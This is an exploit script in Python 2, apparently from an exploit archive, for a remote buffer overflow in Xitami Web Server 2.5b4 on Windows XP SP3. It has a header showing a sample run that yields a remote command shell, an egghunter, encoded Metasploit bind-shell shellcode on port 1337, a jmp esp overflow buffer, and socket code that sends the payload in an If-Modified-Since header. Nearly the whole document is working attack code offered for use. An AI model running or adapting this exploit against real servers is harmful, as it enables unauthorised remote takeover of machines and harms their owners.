# Exploit Title: Xitami Web Server 2.5 Remote Buffer Overflow (Egghunter) # Date: June 4, 2011 # Author: Glafkos Charalambous # Version: 2.5b4 # Tested on: Windows XP SP3 En # Discovered by: Krystian Kloskowski # # root@bt:~/Desktop# python xitami.py 192.168.0.24 80 # [+] Connected # [+] Sending payload... # [+] Check Port 1337 for your shell # root@bt:~/Desktop# telnet 192.168.0.24 1337 # Trying 192.168.0.24... # Connected to 192.168.0.24. # Escape character is '^]'. # Microsoft Windows XP [Version 5.1.2600] # (C) Copyright 1985-2001 Microsoft Corp. # # C:\Xitami>ipconfig # ipconfig # # Windows IP Configuration # # # Ethernet adapter Local Area Connection: # # Connection-specific DNS Suffix . : # IP Address. . . . . . . . . . . . : 192.168.0.24 # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # Default Gateway . . . . . . . . . : 192.168.0.1 # # C:\Xitami>
import time import socket import sys
if len(sys.argv) != 3: print "Usage: ./xitami.py <Target IP> <Target Port>" sys.exit(1)
target = sys.argv[1] port = int(sys.argv[2])
egghunt = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02" "\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" "w00t" # 4 byte tag "\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
# ./msfpayload windows/shell_bind_tcp lport=1337 exitfunc=process R | ./msfencode -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -c 7 -t c shellcode = ("\xba\xa2\xcf\xad\x8d\xdb\xd1\xd9\x74\x24\xf4\x5e\x29\xc9\xb1" "\x7e\x83\xee\xfc\x31\x56\x11\x03\x56\x11\xe2\x57\x70\xe4\x08" "\x09\x2d\x2e\xd1\xec\x46\xf5\x22\x56\x96\x3c\x7b\x1e\x5b\x7e" "\x78\xef\x23\x71\x82\x3e\x5f\xf1\xd3\x58\x3b\x53\x30\xe6\xbc" "\x82\xb3\xba\xf5\xdf\x9e\x21\x78\xcd\x8d\x25\x87\x5b\xd4\xfd" "\x6c\xcd\xcf\x7b\x68\x84\x3d\x07\xcb\x1e\x1b\x06\x11\x31\xfd" "\x90\x27\xff\xe6\x22\x4d\xdd\x1a\xc9\xe1\x93\x45\x4b\x13\x48" "\x74\xcc\x45\x07\x95\xd1\x38\xde\xa3\xef\x7d\x68\xb0\xd1\x67" "\x60\xe5\x89\xb5\xf7\x3e\x2f\x49\xd7\xb8\xc0\xc6\x1b\xfc\xe2" "\xbb\xc8\xae\x39\x78\x81\x4d\xc4\x1c\x2d\x16\x6d\xc3\x04\xde" "\x58\x43\x4e\xc5\x60\x46\x4b\xc9\x79\xfb\x32\xdd\x46\xb8\xd4" "\x61\x62\x92\xf6\xe8\x7b\xe8\x41\xc0\xee\xe2\xbb\x64\x6c\xb8" "\x43\x2d\xfd\xda\x61\xb0\x7c\xe6\x36\xab\x3e\x7a\x80\xe6\x60" "\x2b\x52\x1d\x53\xed\xb4\x94\x86\x8b\x66\x26\x56\x67\xe0\x7c" "\xfb\x1c\xb9\x4f\x75\x4e\x7d\x63\xac\xbc\x7e\x90\xfd\xa1\xb2" "\x6b\x06\xb4\x92\x1f\x90\x26\x1a\x4f\x3d\x18\xa2\x3c\x72\x0f" "\x93\x37\xf7\xf3\x5a\x7f\x33\xbf\x9f\xc2\xea\xb9\x13\x6c\x77" "\xb6\xd4\xc0\x37\x86\x78\xd3\x86\x8c\x9f\x3a\x0f\xb1\x5e\x0f" "\xb9\x09\xf1\x0c\xe9\x2f\xb7\xd7\xea\x37\x4f\x6a\xc3\xdb\x7b" "\x48\x32\x05\xd4\x48\xcc\x47\x59\x41\xc5\x0b\xf5\x02\xeb\x06" "\x7f\xae\x25\x2b\x16\x2d\x51\x18\x91\x9c\x96\x32\x17\x1c\x6e" "\x95\xb9\x4e\xf5\xa6\x29\x8b\x30\x48\x07\x55\xf1\xe4\xa8\xe2" "\x4d\xe0\x6a\xef\xd3\x4e\x07\x4d\xb2\x25\xe0\xb2\x33\x1b\xdc" "\x50\xac\x59\x35\xd9\x91\x9c\x44\x5a\xc1\x52\x19\x0f\x03\xc9" "\x1d\x71\xe5\x79\x54\x3d\xc0\x87\x4d\x9f\x9d\x69\x09\xd4\x6b" "\xe2\xa5\xe0\x77\xd0\xb9\xbd\x85\xd0\x35\xcb\x59\x78\x22\xf2" "\x25\x78\x64\xf6\x2a\x8d\x3e\xc8\xce\x7c\x6f\x64\x24\xb4\x2c" "\x14\xd5\xff\x9c\x84\x40\xf1\x74\xcf\x3c\x4f\xac\x2c\xe2\xae" "\xaa\xaf\xb0\xcf\xc8\x31\x30\xb3\xb0\x8b\x08\x25\x2d\x95\x3d" "\xf5\x0c\x1f\x23\xd9\x87\x31\x79\xd2\x8d\xad\x59\xdd\xb0\x4c" "\xa4\x17\xeb\x97\xb0\x90\x3c\x45\xb7\x3f\x2b\x04\xf3\xc6\xe8" "\x56\x25\x7a\xfd\x6e\x3b\xef\x64\x14\x9b\x67\x08\x9c\x47\x73" "\x24\x1e\x1e\xc6\xd2\xad\xcc\x0c\xc8\xbb\x4e\x12\xde\xf5\x35" "\x25\xe0\xb0\xef\x04\xb5\x29\x62\xc6\x56\x44\x52\x16\xa3\x63" "\x63\xcd\xd1\xc9\x45\x87\x3b\xd6\x4b\x7a\x24\xd5\xd4\x7d\x4c" "\x83\x06\x16\x88\x7f")
jump = "\xeb\x22" # short jump
buf = "A" * 72 buf += "\xD7\x30\x9D\x7C" # jmp esp (user32.dll) / XP SP3 English buf += jump buf += "\x90" * 50 buf += egghunt buf += "w00tw00t" # tag buf += shellcode
header = ( 'GET / HTTP/1.1\r\n' 'Host: %s\r\n' 'If-Modified-Since: pwned, %s\r\n' '\r\n') % (target, buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((target, port)) print "[+] Connected" except: print "[!] Connection Failed" sys.exit(0)
print "[+] Sending payload..." s.send(header) time.sleep(1) s.close()
print "[+] Check port 1337 for your shell"
|